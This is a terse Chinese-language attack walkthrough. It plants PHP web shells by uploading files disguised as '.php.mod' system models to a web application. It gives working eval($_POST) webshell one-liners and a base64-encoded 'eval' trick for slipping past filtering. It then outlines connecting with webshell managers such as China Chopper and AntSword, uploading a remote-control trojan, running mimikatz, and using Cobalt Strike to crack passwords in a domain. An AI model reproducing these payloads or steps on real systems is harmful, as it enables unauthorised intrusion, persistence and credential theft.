导入系统模型
生成一个1.php.mod文件
<?php file_put_contents("shell.php","<?php phpinfo(); ?>"); ?>访问
上传木马root.php.mod
<?php file_put_contents("shell.php","<?php @eval($_POST['root']) ?>"); ?>报错
进行编码绕过拦截
<?php
file_put_contents("root.php","<?php
$a=base64_decode("ZXZhbA==")
$a(\$_POST['a']);
?>");
?>
<?php file_put_contents("cao.php","<?php @eval(\$_POST[cmd]); ?>");?>
菜刀连接
或者冰蝎、中国蚁剑、Weevely等等
打开虚拟终端,执行命令发现是有域环境的
远程控制上传远程控制木马或者上传mimikaz
开启CS神器
使用CS进行文件管理
破解密码-mimikaz
报错